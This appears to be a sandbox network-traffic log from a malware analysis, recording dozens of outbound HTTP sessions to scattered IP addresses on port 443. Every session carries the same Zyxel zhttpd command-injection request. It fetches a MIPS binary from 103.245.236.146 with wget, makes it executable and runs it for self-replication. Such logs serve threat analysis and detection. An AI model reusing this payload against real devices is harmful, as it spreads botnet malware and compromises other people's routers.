                                                Jan 29, 2024 07:07:37.082006931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1628192.168.2.2347724119.184.111.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082070112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1629192.168.2.234367492.206.24.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082109928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1630192.168.2.2347064137.190.125.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082150936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1631192.168.2.2337934157.57.157.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082179070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1632192.168.2.2349586118.176.206.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082228899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1633192.168.2.2341238100.146.99.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082273960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1634192.168.2.2336760176.24.180.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082299948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1635192.168.2.2335628134.231.183.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082338095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1636192.168.2.235026225.163.116.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082387924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1637192.168.2.2354454116.207.121.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082423925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1638192.168.2.235329265.77.31.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082462072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1639192.168.2.2356570157.221.200.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082489014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1640192.168.2.235310684.50.27.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082520008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1641192.168.2.235140066.169.166.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082576036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1642192.168.2.2338012167.71.39.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082602024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1643192.168.2.2340270176.39.236.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082659006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1644192.168.2.2350750208.231.8.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082704067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1645192.168.2.2360880105.98.106.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082731009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1646192.168.2.2342512189.190.210.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082781076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1647192.168.2.2336420136.144.216.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082814932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1648192.168.2.235953241.198.153.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082853079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1649192.168.2.23543202.107.232.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082894087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1650192.168.2.233536657.162.107.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082951069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1651192.168.2.2335772120.97.27.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082967043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1652192.168.2.233834258.156.86.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.082982063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1653192.168.2.234827072.229.124.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083013058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1654192.168.2.235250263.14.174.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083048105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1655192.168.2.2334724126.205.210.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083102942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1656192.168.2.2352068148.203.181.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083147049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1657192.168.2.2359632177.226.85.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083187103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1658192.168.2.233703880.208.136.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083213091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1659192.168.2.23328562.30.146.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083245039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1660192.168.2.234687653.32.105.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083262920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1661192.168.2.2358982144.130.63.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083327055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1662192.168.2.2356354176.101.221.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083343029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1663192.168.2.235264252.58.134.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083401918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1664192.168.2.2343392193.147.165.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083455086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1665192.168.2.234910470.18.207.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083468914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1666192.168.2.23455889.171.240.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083507061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1667192.168.2.234716284.27.123.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083558083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1668192.168.2.233527044.95.9.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083595037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1669192.168.2.233652618.201.237.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083647966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1670192.168.2.233319658.67.133.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083667040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1671192.168.2.234488696.97.99.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083702087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1672192.168.2.2358296205.157.209.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083733082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1673192.168.2.2338114135.13.145.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083780050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1674192.168.2.2357212181.173.51.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083822966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1675192.168.2.233459053.239.20.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083841085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1676192.168.2.2360458132.194.11.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083885908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1677192.168.2.2351908117.164.114.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083937883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1678192.168.2.235919245.85.227.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083985090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1679192.168.2.2340512189.23.20.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.083998919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1680192.168.2.235986687.247.59.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084048986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1681192.168.2.2354210188.233.133.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084075928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1682192.168.2.233485469.226.121.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084100962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1683192.168.2.2346866130.246.96.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084141016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1684192.168.2.2344646144.65.20.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084189892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1685192.168.2.234394024.243.67.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084213018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1686192.168.2.2359136179.238.45.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084266901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1687192.168.2.2334396103.183.187.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084302902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1688192.168.2.233318252.78.136.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084326982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1689192.168.2.2352888140.168.207.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084364891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1690192.168.2.234974625.252.202.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084414959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1691192.168.2.235695451.154.15.218443
                                                TimestampBytes transferredDirectionData
